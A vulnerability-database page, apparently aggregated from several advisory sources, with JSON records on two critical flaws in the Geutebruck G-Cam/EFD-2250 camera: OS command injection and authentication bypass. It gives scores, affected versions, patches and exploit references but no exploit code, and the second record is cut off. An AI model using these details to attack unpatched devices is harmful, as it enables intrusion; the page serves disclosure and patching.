Search

Find a vulnerability

Search criteria

    27 vulnerabilities by geutebrueck

    VAR-201705-3255

    Vulnerability from variot - Updated: 2025-04-20 21:54

    An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker exploited the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. Attackers may exploit these issues to gain unauthorized access to the affected device and to execute arbitrary code within the context of the affected device. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by German Geutebruck company

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "ip camera g cam efd 2250",
            "version": "1.11.0.12"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "BID",
            "id": "96209"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5173",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5173",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-01889",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-113376",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5173",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-5173",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5173",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5173",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-01889",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-611",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-113376",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-5173",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker exploited the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. \nAttackers may exploit these issues to gain unauthorized access to the affected device and to  execute arbitrary code within the context of the affected device. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by German Geutebruck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          }
        ],
        "trust": 2.79
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-113376",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5173",
            "trust": 3.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-045-02",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "96209",
            "trust": 2.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41360",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "05EBD79B-F06D-41C7-986C-D7D4284611B4",
            "trust": 0.2
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "141142",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "id": "VAR-201705-3255",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          }
        ],
        "trust": 1.80833335
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "IoT",
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          },
          {
            "category": [
              "camera device"
            ],
            "sub_category": "IP camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          }
        ]
      },
      "last_update_date": "2025-04-20T21:54:54.269000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck G-Cam/EFD-2250 Remote Code Execution Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/89709"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68204"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-943",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.7,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/96209"
          },
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/41360/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5173"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5173"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          },
          {
            "trust": 0.3,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/943.html"
          },
          {
            "trust": 0.1,
            "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52662"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "OTHER",
            "id": null,
            "ident": null
          },
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
            "ident": null
          },
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "date": "2017-02-14T00:00:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "date": "2017-02-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "date": "2017-05-19T03:29:00.183000",
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01889",
            "ident": null
          },
          {
            "date": "2017-09-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113376",
            "ident": null
          },
          {
            "date": "2017-09-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5173",
            "ident": null
          },
          {
            "date": "2017-03-07T04:02:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004263",
            "ident": null
          },
          {
            "date": "2022-02-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-611",
            "ident": null
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-5173",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Geutebruck G-Cam/EFD-2250 Remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01889"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-611"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3256

    Vulnerability from variot - Updated: 2025-04-20 20:41

    An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control that may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker exploited the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is germany Geutebruck A network camera of the company

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "ip camera g-cam efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "geutebruck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "geutebrueck",
            "version": "1.11.0.12"
          },
          {
            "_id": null,
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "ip camera g cam efd 2250",
            "version": "1.11.0.12"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "BID",
            "id": "96209"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5174",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5174",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-01888",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-113377",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5174",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5174",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5174",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-01888",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-610",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-113377",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-5174",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control that may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker exploited the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is germany Geutebruck A network camera of the company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          }
        ],
        "trust": 2.79
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-113377",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5174",
            "trust": 3.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-045-02",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "96209",
            "trust": 2.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41360",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "409C1FE8-A44C-4075-B30D-BC6E6046C75F",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "id": "VAR-201705-3256",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          }
        ],
        "trust": 1.7083333500000002
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "IoT",
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          }
        ]
      },
      "last_update_date": "2025-04-20T20:41:54.247000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Geutebruck G-Cam/EFD-2250 authentication bypass vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/89708"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68205"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-288",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
